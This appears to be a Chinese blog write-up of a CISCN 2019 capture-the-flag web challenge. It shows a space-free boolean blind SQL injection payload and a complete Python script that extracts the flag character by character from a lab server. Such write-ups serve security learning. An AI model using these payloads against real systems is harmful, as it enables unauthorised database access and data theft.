CISCN2019-华北Day2-wp

题目链接

尝试发现存在过滤

1
2
3
4
5
id = 0	"Error Occured When Fetch Result."
id = 1	"Hello, glzjin wants a girlfriend."
id = 2	"Do you want to be my girlfriend?"
id = {被过滤部分}	"SQL Injection Checked."
id = {其他}	"bool(false)"

fuzz发现空格被过滤,大部分函数都没被过滤

img

尝试0^1发现回显对应1的内容,猜测为数字注入,可直接写表达式

尝试if(1,1,0),同样对应1的内容

则可通过if((ascii(substr((select(flag)from(flag)),1,1))=78),1,0)来判断flag中每一位的内容(想更快也可以把等号换成大于号 用二分法)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

alpha = 'ufesridnophmabcgjklqtvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-'	

url = 'http://node4.anna.nssctf.cn:28761'
flag = 'NSSCTF{'

for i in range(7, 50):
	for j in alpha:
		data = f'if((ascii(substr((select(flag)from(flag)),{i},1))={ord(j)}),1,0)'
		
		res = requests.post(url = url, data = {"id": data})
		
		if 'Hello' in res.text:
			flag += j
			print(flag)
			break
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP